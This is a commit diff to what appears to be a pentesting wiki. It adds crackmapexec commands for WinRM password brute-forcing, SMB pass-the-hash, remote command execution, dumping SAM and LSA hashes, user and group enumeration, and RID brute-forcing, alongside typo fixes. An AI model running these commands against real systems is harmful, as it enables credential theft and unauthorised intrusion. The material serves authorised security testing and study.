GitBook: [master] 3 pages modified
This commit is contained in:
parent
fc1853d121
commit
7f9b1cdbe1
|
@ -330,6 +330,12 @@ patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt –t 1 –x
|
|||
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
|
||||
```
|
||||
|
||||
### Winrm
|
||||
|
||||
```bash
|
||||
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
|
||||
```
|
||||
|
||||
## Local
|
||||
|
||||
### Online cracking databases
|
||||
|
|
|
@ -121,6 +121,18 @@ winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
|
|||
|
||||
## WinRM connection in linux
|
||||
|
||||
### Brut Force
|
||||
|
||||
```ruby
|
||||
#Brute force
|
||||
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
|
||||
|
||||
#Just check a pair of credentials
|
||||
crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password>
|
||||
crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH>
|
||||
#Crackmapexec won't give you an interactive shell, but it will check if the creds are valid to access winrm
|
||||
```
|
||||
|
||||
### Using evil-winrm
|
||||
|
||||
```ruby
|
||||
|
|
|
@ -174,6 +174,7 @@ smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
|
|||
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
|
||||
crackmapexec smb <IP> -u '' -p '' --shares #Null user
|
||||
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
|
||||
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user
|
||||
```
|
||||
|
||||
### **Connect/List a shared folder**
|
||||
|
@ -268,11 +269,11 @@ smbclient //<IP>/<share>
|
|||
Commands:
|
||||
|
||||
* mask: specifies the mask which is used to filter the files within the directory \(e.g. "" for all files\)
|
||||
* resurse: toggles recursion on \(default: off\)
|
||||
* prompt: toggles prompting for filesnames off \(default: on\)
|
||||
* recurse: toggles recursion on \(default: off\)
|
||||
* prompt: toggles prompting for filenames off \(default: on\)
|
||||
* mget: copies all files matching the mask from host to client machine
|
||||
|
||||
\(Information from the manpage of smbclient\)
|
||||
\(_Information from the manpage of smbclient_\)
|
||||
|
||||
## Authenticate using Kerberos
|
||||
|
||||
|
@ -287,19 +288,29 @@ rpcclient -k ws01win10.domain.com
|
|||
|
||||
### **crackmapexec**
|
||||
|
||||
crackmapexec can execute commands **abusing** any of **mmcexec, smbexec, atexec, wmiexec** being **wmiexec** the **default** method. You can indicate which option you prefer to use with the parameter `--exec-method`:
|
||||
|
||||
```bash
|
||||
apt-get install crackmapexec
|
||||
|
||||
crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
|
||||
crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
|
||||
crackmapexec 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
|
||||
# Using --exec-method -1,2,3 wmiexec,atexec,smbexec
|
||||
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
|
||||
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
|
||||
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
|
||||
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}
|
||||
|
||||
crackmapexec -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
|
||||
crackmapexec -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
|
||||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
|
||||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
|
||||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions (
|
||||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
|
||||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
|
||||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
|
||||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
|
||||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
|
||||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
|
||||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute
|
||||
```
|
||||
|
||||
### \*\*\*\*[**psexec**](../windows/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows/ntlm/smbexec.md)\*\*\*\*
|
||||
### [**psexec**](../windows/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows/ntlm/smbexec.md)
|
||||
|
||||
Both options will **create a new service** \(using _\pipe\svcctl_ via SMB\) in the victim machine and use it to **execute something** \(**psexec** will **upload** an executable file to ADMIN$ share and **smbexec** will point to **cmd.exe/powershell.exe** and put in the arguments the payload --**file-less technique-**-\).
|
||||
**More info** about [**psexec** ](../windows/ntlm/psexec-and-winexec.md)and [**smbexec**](../windows/ntlm/smbexec.md).
|
||||
|
@ -362,7 +373,7 @@ ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rid
|
|||
## SMB relay attack
|
||||
|
||||
This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network, and **relays** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**.
|
||||
[**More information about this attack here.**](pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)\*\*\*\*
|
||||
[**More information about this attack here.**](pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
|
||||
|
||||
## SMB-Trap
|
||||
|
||||
|
|
Loading…
Reference in New Issue